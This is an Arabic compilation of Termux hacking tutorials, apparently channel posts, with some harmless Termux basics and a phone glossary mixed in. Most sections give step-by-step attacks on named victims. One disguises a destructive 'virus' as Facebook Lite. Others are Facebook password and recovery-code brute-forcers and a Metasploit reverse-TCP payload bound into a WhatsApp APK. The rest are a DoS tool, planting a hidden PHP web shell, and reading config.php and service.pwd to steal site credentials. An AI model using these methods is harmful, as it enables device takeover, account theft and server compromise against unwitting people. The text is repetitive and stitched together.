أداة Ngrok هي اداة تقوم بفتح بورت داخل الشبكة

البورت هو البوابة او السيرفر الذي يساعدنا بوصول التبليغ الينا من جهاز الضحية ولايمكن ان تتم اي عملية اختراق بدونه لذلك يجب ان يكون البورت مفعل وأداة Ngrok هي التي تساعدنا ب فتح البورت

أوامر تثبيت أداة Ngrok


يجب الذهاب من المتصفح الى موقع Ngrok وهذا هو: www.ngrok.com

تقوم بالتسجيل بالموقع باي حساب تملكه

عند التسجيل بالموقع يظهر لنا كود او توكين خاص بفتح الاداة لذلك ننسخه ويبدا الكود ب (./ngrok)

نذهب لكلمة Download ونضغط عليها ستفتح صفحة جديدة ونضغط على كلمة linux ARM 

سيتم تنزيل الاداة بملف zip ننقله عن طريق تيرموكس الى ال HOME بالامر :

 $HOME الاداة mv

نقوم بفك الضغط بكتابة الامر:  الاداة unzip 

بعد فك الضغط تظهر كلمة ngrok باللون الابيض لتشغيل الاداة نكتب الامر : chomd +x ngrok بعدها ستظهر كلمة ngrok باللون الاخضر لتشغيل الاداة وفتح البورت نلصق الكود الذي اخذناه من الموقع ونضغط Enter 

لفتح البورت نكتب الامر: 4444 ngrok tcp/.

وستفتح نافذة جديدة تظهر لك بان البورت يعمل والدليل هناك كلمة online وهكذا يتم فتح البورت

ملاحظة: ليس شرط ان يكون البورت 4444 اختر البورت الذي تريده وشكرا للمتابعة ..

اداة جميله للبحث عن يوزر محدد بين مواقع التواصل الاجتماعي

مثال لو بدك تبحث على هاذا اليوزر admin رح يطلعه بجميع مواقع التواصل الاجتماعي ورابط الوصول اليه #انشاء_الله_تكونو_فهمتوا

#الاوامر
$ pkg install python

$ pkg install git


$ git clone https://github.com/sdushantha/sherlock

$ cd sherlock

$ pip3 install -r requirements.txt

#امر_التشغيل

$ python3 sherlock.py
الان لو بدك تبحث عن admin اكتب امر↓

$ python3 sherlock.py admin

الان رح يبدأ البحث ورح يطلع لكم جميع الروابط

ورح تحتفظ بملف admin.txt
كله على حسب اليوزر

اكتبوا امر

python3 sherlock.py --help

ورح تعرفوا كل شي مختص بالاداة👍

تثبيت ادات
Sublister-subdomain Enumration

Installation :

$ apt update

$ apt upgrade

$ apt install git

$ apt install python2

$ git clone https://github.com/aboul3la/Sublist3r

$ cd Sublist3r

$ pip2 install requirements.txt

$ pip2 install requests

Run :

$ python2 sublist3r.py

لسلام عليكم ورحمه الله وبركاته
اخواني في هذا الدرس سأعطيكم
طريقة صنع فايروس لتدمير جهاز الضحيه وتغيير اللوغو الخاص به الى لوغو فيسبوك

اوامر التثبيت

اوامر التثبيت
pkg install python2

بعدها نقوم بلتحميل الملف من الرابط

https://www.mediafire.com/file/abvvp640ersa4r5/vbug.zip

وبعد تحميله ننقله الى الذاكره الداخليه
وبعدها ندخل تطبيق termux
ونكتب

cd /sdcard

mv vbug.zip /$HOME

cd /$HOME

unzip vbug.zip


بعدها
cd vbug

chmod 777 vbug.py

python2 vbug.py

بعدها منضغط انتر

منختار واحد


بعدها منكتب

E

الأن اتممنا الخطوة الاولى

نروح الى الفايروس

cd ..


cd vbug/virus/

نقوم بنقل التطبيق الى ذاكرة الهاتف

mv ELITE /sdcard/


رابط تطبيق تغيير اللوغو
من السوق بلاي
لسلام عليكم ورحمه الله وبركاته
اخواني في هذا الدرس سأعطيكم
طريقة صنع فايروس لتدمير جهاز الضحيه وتغيير اللوغو الخاص به الى لوغو فيسبوك

اوامر التثبيت

اوامر التثبيت
pkg install python2

بعدها نقوم بلتحميل الملف من الرابط

https://www.mediafire.com/file/abvvp640ersa4r5/vbug.zip

وبعد تحميله ننقله الى الذاكره الداخليه
وبعدها ندخل تطبيق termux
ونكتب

cd /sdcard

mv vbug.zip /$HOME

cd /$HOME

unzip vbug.zip


بعدها
cd vbug

chmod 777 vbug.py

python2 vbug.py

بعدها منضغط انتر

منختار واحد


بعدها منكتب

E

الأن اتممنا الخطوة الاولى

نروح الى الفايروس

cd ..


cd vbug/virus/

نقوم بنقل التطبيق الى ذاكرة الهاتف

mv ELITE /sdcard/


رابط تطبيق تغيير اللوغو
من السوق بلاي
https://play.google.com/store/apps/details?id=com.gmail.heagoo.apkeditor

بعد تحميل التطبيق قم بأختيار الفايروس وقم بتغيير الايقونه الخاصه به الى ايقونة فيسبوك لايت


بتمنى يكون الشرح اعحبكم وشكرا لكم


بعد تحميل التطبيق قم بأختيار الفايروس وقم بتغيير الايقونه الخاصه به الى ايقونة فيسبوك لايت


بتمنى يكون الشرح اعحبكم وشكرا لكم

♦بسم الله الرحمن الرحيم ♦

الـسـفـاح القـاتـل

←اشرحنا اداه نخمين رمز الاسترداد للفيس→

#الاوامر↓↓

→ pkg install python3

→ pkg install nano

→ pip3 install requests bs4

→ pkg install git

→ git clone https://github.com/yehia-hacker/WOLF.git

→ ls

→ cd WOLF

→ ls

→ chmod +x Script.py WOLF-16-YEHIA.py PROXY-VBN.py Encrypted.py

→ ls

→ chmod +x WOLF.py

→ python3 WOLF.py

←الان رح تكتب ID او حساب الضحيه وانتر ويبدأ يخمن رمز الاستيراد من تلقاء نفسه→

اٰلـہٰٖاٰيٰـہٰٖنٰـہٰٖمٰـہٰٖوٰسٰـہٰٖ اٰلـہٰٖسٰـہٰٖوٰرٰيٰـہٰٖ🔥‌‏❥ ابو اسلام:
السلام عليكم ورحمة الله وبركاته

اليوم شرحنا طريقه دمج بيليود في التطبيقات أو الفيديوهات عبر تطبيق termux  نفتح التطبيق لتثبيت الاداه

الاوامر
(1) apt update

(2) apt upgrade

(3) pkg install git

(4) clear

(5) git clone https://github.com/Hax4us/Tmux-Bunch.git

(6) ls

(7) cd tmux-Bunch

(8) ls

(9) cat README.me

(10) chmod +x steup

(11) ./setup

(12) ls

(13) cd tmuxbunch

رح تشتغل الأداة اظغط انتر الان نفتح صفحه جديده في Termux

(14) cd /sdcard
ملاحظه لازم تكون مجهز التطبيق الي بدك تسوي فيه بايلود في الذاكره الداخلية
(15) ls
بعد كتابات ls رح يفتح لك كل الملفات في ذاكرتك الداخلية نختار انا نقلت تطبيق whatsapp رح ادمج فيه بايلود

نكتب

(16) mv whatsapp.apk $HOME

(17) cd $HOME

(18) ls

(19) mv whatsapp.apk Tmux-Bunch

(20) ls

(21) cd  Tmux-Bunch/

(22) ls

(23) mv whatsapp.apk binder/

(24) ls

الان نرجع عا الاداه الصفحه الاوله اطلع من الصفحه التانيه

اكتب 6 الادات وحدها رح تدخل ع مجلد binder اللي نقلنا فيه برنامج مراد تلغيمه

اكتب رقم واحد لدمج فيه بايلود ميتاسبلويت انتر

بعدها رح يطلب منك الهوست والابيبي الخاص بك

افتح صفحه جديده لمعرفه ايبي جهازك وكتب الأمر ifconfig لمعرفه ايبي جهازك انسخة ورجع لصفحه الاداه ولصقه بعدها انتر رح يطلب البورت لازم تكون فاتح بورت 4444 في الرواتر تبعك عادي نحط 4444 انتر بعدها حط اسم الي بدك ياه بدون apk مثلن whatsapp انتر الان رح يقوم بدمج بايلود في التطبيق الي نقلنه لا ملف binder بعد دمج بايلود اظغط انتر مرتين اكتب رقم 10 للخروج من الاداه انتر

بعدها بعد الخروج

(25) ls

(26) cd embout

(27) ls
الان تجد برنامج خاص بك ملغم ب بايلود ميتاسبلويت ننقله للملفات عبر امر

(28) mv whatsapp.apk $HOME

(29) cd ../..

لعرض الملفات

(30) ls

نقوم بنقله لملفات sdcard عبر أمر

(31) mv whatsapp.apk /sdcard
بعدها
(32) ls

الان نفتح الذاكره الداخلية رح نشوف في تطبيق اسمو whatsapp نجي نثبتو هاد التطبيق الملغم انا رح اخترق جهازي لو بدي اخترق جهاز الضحيه خليه يثبت التطبيق

 الان اكتب امر فتح الميتاسبلويت
(33) ./msfconsole

الأن لو فتح الضحيه التطبيق رح تفتح الجلسه

نكتب أمر

(34) use exploit/multi/handler

بعدها
(35) set payload android/meterpreter/reverse_tcp

بعدها
(36) set LHOST 192.168.1.6

بعدها
(37) set Lport 4444

الان نشغل جلسات ميتير ونشغل برنامج الملغم الأمر

(38) run

بعد مايفتح التطبيق الملغم رح تشوف فتحت الجلسه

السلام عليكم
شرح تثبت الميتاسبوليت بعد توقفه وهذا اخر اصدر 12.3.1

<<1>> apt update
<<2>>apt upgrade
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<R>> pkg install python2 python3 git ruby perl proot
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<3>> termux-setup-storage
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<4>>- apt install curl
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<5>>curl -LpO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<6>> ls
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<< 7>>chmod +x metasploit.sh
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<8>>ls
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<9>> bash metasploit.sh
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<10>>ls
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<11>>cd metasploit-framework
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<12>> bundle install rake-12.3.1
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<13>>pip2 install bundler
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<14>> bundle config build.nokogiri --use-system-libraries
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<15 >>gem install nokogiri
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<16 >> gem install pkg-config -v 12.3.1"
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<17 >> bundle install rake-12.3.1
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
<<18 >> msfconsole

ملاحظه تم تجربه الطريقه اكثر من 5 مرات واكثر من معالج
مقدام الشرح اخوكم

اداة سريعه للتخمين على حسابات الفيس

#الاوامر
َgit clone https://github.com/Ha3MrX/facebook-cracker

cd facebook-cracker

chmod +x facebook.py

python2 facebook.py

الان حط الID او رقم الحساب او الايميل وحط انتر وبعدين حط اسم اللسته الي فيها باسوردات التخمين ورح يبدأ يخمن 👍

الأوامر الأساسية في @termuxx



‎ئًا مثل "/home /username".
2. ls - الأمر "Is" يعمل على عرض قائمة اسماء الملفات والمجلدات الموجودة في المجلد الذي توجد فيه. يمكنك أيضا رؤية جميع الملفات المخفية باستخدام الأمر "ls -a".
3. cd - الأمر "cd" يمكنك استخدامه للانتقال الى مجلد معين، على سبيل المثال ، إذا كنت في المجلد الرئيسي Home، وتريد الانتقال إلى مجلد التحميلات، يمكنك كتابة "cd Download" باعتبار ان Download هو اسم المجلد الذي تريد الدخول اليه.
4. mkdir و rmdir - استخدم الأمر mkdir لإنشاء مجلد فارغ جديد، على سبيل المثال ، إذا كنت تريد إنشاء مجلد باسم "Images" ، فيمكنك كتابة "mkdir Images". ويمكنك حذف المجلد باستخدم الامر rmdir متبوعا باسم المجلد اذا كان الاخير فارغا، ولحذف مجلد يحتوي على ملفا استخدم rm.
5. rm - استخدم الأمر rm لحذف الملفات او المجلدات. وبشكل اعتيادي لحذف ملف باسم info.txt استخدم الامر على الشكل: rm info.txt
6. touch - يتم استخدام الأمر touch لإنشاء ملف جديد سواء كان ملف نصي txt فارغ او ملف zip فارغ. على سبيل المثال: "touch new.txt".
7. help - يستخد هذا الامر لمعرفة المزيد من المعلومات عن أمر معين وكيفية استخدامه، على سبيل المثال، يعرض "cd help" صفحة معلومات تشرح لك كيفية استخدام أمر cd.
8. cp - استخدم الأمر cp لنسخ الملفات من مجلد الى آخر. يحتاج الأمر إلى متغيرين: الأول هو مسار الملف المراد نسخه والثاني هو مكان النسخ.
9. mv - استخدم الأمر mv لنقل الملفات عبر سطر الأوامر. يمكننا أيضًا استخدام الأمر mv لإعادة تسمية الملفات. على سبيل المثال، إذا أردنا إعادة تسمية ملف "text" الى ملف "new" ، يمكننا استخدام الامر "mv text new".
10. echo - يمكنك عبر الأمر "echo" ادخال بعض البيانات الى ملف معينوالذي عادة ما يكون ملف نصي. على سبيل المثال ، إذا كنت تريد إنشاء ملف نصي جديد تكتب فيه عبارة "hello my name is nour"، تحتاج فقط إلى كتابة "echo hello my name is nour >> new.txt".
11. cat - يستخدم الأمر cat لعرض محتوى الملفات، يمكنك عرض محتوى الملف السابق عبر الامر:
cat new.txt
12. nano و vi هي برامج تحرير النصوص في سطر أوامر Linux. الأمر nano عبارة عن محرر نصي جيد يمكن استخدامه في التعديل على الملفات النصية و vi أبسط من نانو في التعامل، كما يمكنك إنشاء ملف جديد أو تعديل ملف باستخدام هذا المحرر.
13. df - يعرض لك الامر df المعلومات المتعلقة بالمساحة والتخزين، حيث يقدم لك حجم الملفات والمجلدات بالتفصيل.
14. zip و unzip - استخدم الامر zip لضغط الملفات في أرشيف مضغوط ، و unzip لفك الضغط واستخراج الملفات من الأرشيف المضغوط. ( يمكن ان لا يعمل الامر في البداية، لأنك بحاجة لتثبيت اداة zip اولا عبر الامر pkg install zip).
15. uname -a - استخدم uname لإظهار بعض المعلومات حول النظام الذي يعمل به جهازك. او استخدام الأمر "uname -a" ليعرض لك معظم المعلومات عن النظام. بالاظافة الى تاريخ إصدار النواة kernel، إصدار و نوع المعالج ، إلخ.

‎يمكنك البحث عن اوامر اخرى وهي نفس الاوامر المستعملة في لينكس، في حين ان بعض اوامر termux للاختراق، يمكنك استعمالها بعد تثبيت ادوات خارجية، وفي ما يلي طريقة تثبيت/حذف الادوات.

‎5. تثبيت الادوات والتعامل مع مدير الحزم apt:
apt هو مدير الحزم او مدير الادوات على debian و كل التوزيعات الدبيانية مثل Ubuntu و مانت لينكس، وهو برنامج يعمل عبر سطر الاوامر ويمكن اعتباره اداة الى جوار كل الادوات الاخرى، ووظيفته تكمن في التحكم في الادوات او الحزم المثبتة وتثبيت حزم جديد، في ما يلي طريقة عمل مدير الحزم apk:
‎يمكنك استعمال الاوامر التالية لترقية او تحديث جميع الحزم المثبتة الى آخر اصدار:
apt list --upgradable
apt update
apt upgrade

‎لتثبيت ادواة او حزم جديدة عبر مدير الحزم apt، كل ما عليك هو كتابة الامر apt-get install xxx حيث ان xxx هو اسم الاداة او الحجمة التي تريد تثبيتها، وفي ما يلي مثال لتثبيت محرر النصوص nano الشهير:
apt-get install nano

‎لحذف اداة من التطبيق، يمكنك استعمال نفس الامر متبوعا ب remove على الشكل apt-get remove xxx حيث ان xxx هو اسم الاداة، وفي ما يلي مثال على حذف nano:
apt-get remove nano

‎يمكن استعمال الاوامر المتعلقة بمدير الحزم اما عبر apt مباشرة او عبر apt-get كما استعملنا في المثالين اعلاه، يمكنك ايضا استعمال مدير حزم آخر مثل امر pkg بنفس الطريقة.
‎اوامر termux للاختراق:
‎هناك العديد من الاوامر التي يمكن استعمالها في الاختراق على هاتف اندرويد عبر تطبيق Termux، الا ان معظمها يحتاج الى تثبيت ادوات خارجية عبر الطريقة المذكورة ادناه، اذ لا يوفر التطبيق اوامر الاختراق بدئيا،

شرح طريقة تغير واجهة termux شرح فقط في قناتنه🔱
الاوامر :

 -الأمر الاول🌚
apt-get update

-الامر الثاني 🌚
apt-get install git

-الامر الثالث🔨🌚
git clone https://github.com/Cabbagec/termux-ohmyzsh

- الامر الرابع🌚
./install.sh

-رقم 29 ثم 9 ❤️

انشاء حسابات ssh
➖➖➖➖➖➖➖➖➖➖➖
⏩ apt update && apt upgrade
⏩ pkg install python2
⏩ pkg install nano
⏩ pkg install git
➖➖➖➖➖➖➖➖➖➖➖
⏩ git clone https://github.com/Rusmana-ID/ssh-mytunneling
⏩ cd ssh-mytunneling
⏩ python2 install.py
➖➖➖➖➖➖➖➖➖➖➖
⏩ python2 ssh-mytunneling.py
➖➖➖➖➖➖➖➖➖➖➖

RAM، ROM، mAh ،CMOS وغيرها ... ماذا تعني كل هذه الكلمات التي تقرأها في مواصفات هاتفك؟


Adware: برامج الإعلانات غير المرغوب فيها من قبل المستخدم حيث هو مسؤول عن إظهار هذه الإعلانات.

Android: نظام التشغيل المستخدم في هواتفنا والذي اشترته  غوغل في عام 2005 ،  وهو حاليًا في الإصدار 9.0.

App: تطبيق أو برنامج تم تطويره لنظام تشغيل معين يسمح للمستخدم بإجراء سلسلة من المهام

Bloatware: التطبيقات التي تم تثبيتها مسبقًا بواسطة الشركة المصنعة والتي لا يمكن إلغاء تثبيتها بسهولة.

Bootloader: محمل الإقلاع ، هو عبارة عن برنامج مصمم  للقيام بكل ما يلزم لبدء تشغيل نظام التشغيل الخاص بنا.

CMOS: رقاقة رخيصة التصنيع ، تتألف من خلايا مستقلة ، وهي مسؤولة عن رقمنة وحدات البكسل في الصورة.

CPU : وحدة المعالجة المركزية.  قطعة توجد في الأجهزة حيث تقوم  بإجراء معظم العمليات . و كلما زادت قوة وحدة المعالجة المركزية   زادت سعة المعالجة.

Dual Pixel: تقنية موروثة من كاميرات الرفلس réflex. إنه يسمح بالتركيز بشكل أسرع من

PDAF ، وبالتالي زيادة حدة وتعزيز النتائج النهائية للصور .

GPU: وحدة معالجة الرسومات. عنصر في الأجهزة الذي يتم فيه إجراء معظم العمليات الحسابية المرتبطة بعمليات الغرافيك  الخاصة بجهازنا.

GPS : نظام تحديد المواقع العالمي. النظام الذي يسمح لنا بتحديد موقع أي كائن أو مركبة أو منطقة أو شخص ...

Kernel : برامج أساسية في أي جهاز مسؤول عن الاتصال الصحيح بين البرامج والأجهزة.

mAh: وحدة الشحن الكهربائية التي نستخدمها لمعرفة السعة الإجمالية للبطارية.

NFC:  التكنولوجيا اللاسلكية التي تعمل  على تمرير البيانات ، وأتمتة الإجراءات ...

NPU: وحدة المعالجة العصبية. عنصر في الأجهزة  ومسؤول عن معظم المهام المتعلقة بالذكاء الاصطناعي.  يقوم بتحميل عمل وحدة المعالجة المركزية ووحدة معالجة الرسومات.

RAM : ذاكرة الوصول العشوائي. ذاكرة العمل التي يتم فيها تحميل جزء كبير من تعليمات وحدة المعالجة المركزية.

RAW . ملف "الخام" التي يقدمها جهاز استشعار الكاميرا. على عكس
JPEG ، لا يحتوي على أي تكوينات مضغوطة أو مضافة، ويحتوي على جميع معلومات المستشعر.

Recovery : وضع الاسترداد  في الهاتف . إنه يسمح بتنفيذ مهام مثل إعادة ضبط  المصنع ، بالإضافة إلى تحميل أنظمة التشغيل وتثبيتها 

ROM:  هي ذاكرة القراءة  تحتوي على البرامج الثابتة للجهاز.

ROOT : يسمح بتعديل نظامنا حيث يمكننا الوصول إلى جميع مجلدات جهازنا ، بالإضافة إلى إمكانية تعديلها.

الاومر الاوله في تشغيل termux قبل البدء

pkg update
pkg upgrade
pkg install python
pkg install python2
pkg install python3
pkg install ruby
pkg install git
pkg install php
pkg install java
Pkg install google
pkg install bash
pkg install perl
pkg install nmap
pkg install bash
pkg install clang
pkg install macchanger
pkg install nano
pkg install figlet
pkg install cowsay
pkg install curl
pkg install tar
pkg install zip
pkg install unzip
pkg install tor
pkg install sudo
pkg install wget
pkg install wcalc
pkg install openssl
pkg install bmon

انسخها كها وضعها في التريمكس وتلقائيا حتثبت

اقوئ اداة ليـّۓ الهجوم علـّۓ. الموقع
XERXES

Installation:

$ apt update && apt upgrade

$ apt install git

$ apt install clang

$ git clone https://github.com/zanyarjamal/xerxes

$ cd xerxes

$ chmod +x *

usage :

$ clang xerxes.c -o xerxes

طريقة اختراق السيرفرات #شرح_حصري

لنفترض انك اخترقت موقع بأي ثغره .. او عندك انت موقع لك عند اي سيرفر

وبدك تخترق السيرفر طريقة اختراق السيرفر

اولآ بتحميل سكربت الشيل بلغة php على جهازك
وهي وصلة الشيل
http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip
------------------------------------------------------------------------------
ال php شيل ((phpshell )) هو سكربت بلغة (( php ))

وبتقدر من خلالو تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع يلي على السيرفر وايضا رؤية ملف الــ config
يلي على السيرفر

ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..

بعد التحميل بتقدر تخترق السيرفر بشكل كامل ..

مثال ..👇

نفترض انك اخترقت هذا الموقع
http://www.Anonymous.com/
وقمت بتحميل الــ phpshell
على ملف download
رح يصير العنوان بهدا الشكل
www.Anonymous.com/download/phpshell.php

وبعدين اذا دخلنا الى العنوان رح تشوف كلمة اسمها Command وامامها فراغ

في الفراغ هذا رح نحط فيه اوامر اللينكس..

بس قبل البدء في الشرح الجديد.. احب اوضح نقطه مهمه ::--

يمكن لو شاف صاحب الموقع يلي اخترقتو الشيل.. يروح ويحذفه الك

ولاكن لو تسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي
لاخفائه نسوي هيك بهي الطريقة www.Anonymous.com/download/phpshell.php wget
وبعدين نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ اضفنا نقطة . واذا حذف الاول راح يكون معانا الثاني ومخفي
---------------------------------------------
والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.Anonymous.com/download/phpshell.php

وثم نجد كتابة اسمها Command وامامها فراغ

في الفراغ هذا ندخل اوامر اللينكس عليه..

ونحط الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..

ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ ((safe mode))

شرح الاوامر --==--
هلئ رح اعلمكم طريقة سحب : قواعد البيانات - المواقع - الباسوردات

نبدأ من الاسهل حتى الاصعب

1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له
find / -name config.php
راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع يلي على السيرفر بالعادة بتكوين كثيرة وانا بالعادة يخرج لي 300و 250 موقع ))
المواقع رح تكون باللون الزهري

طيب بدنا نقرأ الي مكتوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

المهم نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdo/اسم الملف/config.php

بعدين راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات

روح اضرب المنتدى وبعدين ملف الــ admin ودخل اليوزر والباسورد لقاعدة البيانات
او الدخول عن طريق برنامج الــ MySQL-Front_2.5_Setup

-------------------------------------------------------
الأن خلصنا من قاعدة البيانات باقي باسوردات المواقع..

اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd

وراح يطلع المواقع بالشكل هذا
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب هلق شوف الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

وراح يجينا الباسورد للموقع ومشفر بمقياس DES

او نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_ht
بعدها بصير السيرفر والمواقع يلي على السيرفر تحت سيطرتك وتقدر تعمل فيهم يلي بدك ياه

شرح تثبيت اداة فيدورا fedora لإعطاء صلاحيات الروت لبعض الادواة التي تحتاج روت في التيرموكس



apt update

 apt install wget -y && /data/data/com.termux/files/usr/bin/wget https://raw.githubusercontent.com/nmilosev/termux-fedora/master/termux-fedora.sh && sh termux-fedora.sh



بعدين حسب جهازك شو بدعم 
f27_arm64
f28_arm64
f29_arm64

مثلا انا جهازي بيدعم f29_arm64 بتكتبو بهذا الشكل

sh termux-fedora.sh f29_arm64


بعدها اكتب هذا الامر
$  start fedora



 
بعد التثبيت اكتب هذا الامر لتحديث الاداة
  dnf update

بعدها سوف يظهر لك (y/n) اكتب y

الان تم تثبيت الاداة بنجاح

CS:
السلام عليكم ورحمة الله
بسم الله نبدأ

#الدرس_الثاني اختراق الجهاز عن طريق ارسال تطبيق ملغم لضحيه

في طريقتين لإنشاء تطبيق ملغم (بايلود) 
1- ممكن انشئ تطبيق ملغم عبر أداة tmvenom
2- ممكن أدمج تطبيق


الطريقه الاولي :-   انشاء تطبيق ملغم

اول خطوة نفتح VPN
ثاني خطوة نفتح termux  و نكتب الأمر التالي ifconfig

ثالث خطوة  نفتح النجروك  والبورت  ح يكون 4444
أمر الفتح  
./ngrok tcp 4444



رابع خطوة خطوة نثبت الأداة tmvenom


pkg install python2 python2-dev git wget -y

وبعده

git clone https://github.com/TechnicalMujeeb/tmvenom


وبعد تحميل الاداة

cd tmvenom

 chmod +x install.sh


bash install.sh
بعد تثبيت الأداة أمر التشغيل

python2 tmvenom.py

CS:
شرح عمل نسخة احتياطيه لبياناتك على التيرمكس
افتح تطبيق termux
اول خطوة نقوم بعمل نسخ احتياطي للبيانات
نكتب هذه الاوامر بلترتيب


cd /data/data/com.termux/files


 tar -cvzf /sdcard/Download/termux.tgz --owner=0 --group=0 home usr

الان سيقوم بأخذ نسخه احتياطية للبيانات ووضعها في مجلد Download

الخطوة الثانية
اذا كنت تريد استعادة النسخ الاحتياطي


اكتب هذه الاوامر بلترتيب


cd /data/data/com.termux/files



 tar -xvzf /sdcard/Download/termux.tgz


الان سيقوم البرنامج بأسترجاع جميع البيانات الخاصه به المحتفظ بها في النسخ الاحتياطي